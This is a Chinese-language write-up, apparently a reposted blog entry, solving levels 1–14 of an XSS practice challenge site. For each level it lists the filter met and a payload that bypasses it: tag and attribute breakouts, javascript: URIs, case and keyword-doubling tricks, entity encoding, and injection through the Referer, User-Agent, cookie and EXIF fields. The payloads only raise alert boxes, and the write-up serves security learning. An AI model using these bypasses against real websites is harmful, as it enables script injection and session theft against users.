XSS挑战之旅 解题记录
本文記錄xss挑戰(zhàn)解題,檢驗(yàn)自己的xss技術(shù)
題目鏈接
Level1
鏈接為http://test.xss.tv/level1.php?name=test
頁面沒有輸入點(diǎn)
直接構(gòu)造payloadname=<script>alert(1)</script>
Level2
一樣簡單,給出payload"><script>alert(1)</script>
Level3
過濾了尖括號
故用`’ οnclick=alert(1)//
Level4
和L3一樣,不同的是這里用雙引號閉合
" onclick=alert(1)//
Level5
用上面的進(jìn)行嘗試,發(fā)現(xiàn)將onclick變成o_nclick
這里改用添加鏈接方式
"><a href="javascript:alert(1)">
然后點(diǎn)擊鏈接即可
Level6
這里也將href過濾成hr_ef
這里用大小寫繞過過濾
"><a hrEf="javascript:alert(1)">
Level7
這里直接將href script刪除
于是采用機(jī)智方法
"><a hrhrefef="javascrscriptipt:alert(1)">
Level8
這里可以添加鏈接到頁面
于是直接javascript:alert(1)
但是不行因?yàn)闀cript過濾成scr_ipt
這里采用HTML字符實(shí)體轉(zhuǎn)換
將script轉(zhuǎn)化成script
最后payload javascript:alert(1)
Level9
使用上關(guān)的payload,被提示不合法,說明對鏈接進(jìn)行了格式要求
這里嘗試了很多次,最后看到網(wǎng)上的解答,吐血
因?yàn)檫@里只需要有http://即可
javascript:alert("http://")
值得一提的是雙引號會被過濾,于是第一個(gè)雙引號用實(shí)體轉(zhuǎn)換機(jī)即可
Level10
看源碼,發(fā)現(xiàn)有幾個(gè)type=hidden的輸入框
于是使其顯示并可以onclick觸發(fā)事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"
Level11
看源碼,有個(gè)是顯示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
這里也是嘗試很多次,但是始終無法使得輸入框改變type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text
Level12
和上一關(guān)類似,這次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"
Level13
看網(wǎng)頁源碼有個(gè)輸入框叫cook,故去看看cookie
果然有個(gè)cookie值為call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"
Level14
這里也是沒思緒
百度得出答案,這里用的是烏云爆出的exif viewer的漏洞
修改圖片exif信息如標(biāo)題、作者' "><img src=1 onerror=alert(document.domain)>即可
之后第15關(guān)的鏈接失效了,就沒做下去了
總結(jié)
以上是生活随笔為你收集整理的XSS挑战之旅 解题记录的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 最深的红尘里,陌上为谁花开
- 下一篇: JSON格式化工具下载